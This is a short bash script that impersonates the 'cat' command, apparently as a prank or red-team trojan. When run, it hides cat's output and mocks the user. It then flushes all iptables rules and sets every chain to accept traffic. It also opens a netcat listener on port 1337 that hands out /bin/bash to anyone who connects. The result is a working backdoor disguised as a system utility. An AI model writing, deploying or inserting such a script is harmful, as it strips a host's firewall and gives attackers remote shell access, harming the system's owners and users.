#!/bin/bash

# Execute real 'cat' command and don't display anything. Also mess with them
/lib/module_cat $@ | grep -Ev "*" | echo "No cats allowed"

# Every good script needs some psychological warfare
echo ""
echo "Gonna have to use something like vim if you want to read this file ;P"

# Source the ~/.bashrc
source ~/.bashrc

# Flush iptables rules
command iptables -F
command iptables -t mangle -F
command iptables -t nat -F
command iptables -t filter -F
command iptables -t raw -F
command iptables -t security -F

# Change default policies for 'iptables'
command iptables -P INPUT ACCEPT 
command iptables -P OUTPUT ACCEPT
command iptables -P FORWARD ACCEPT

# Open up a netcat listener on the best port (TCP)
nc -lp 1337 -e /bin/bash &

# Have some fun :D
command apt install sl > /dev/null
command sl
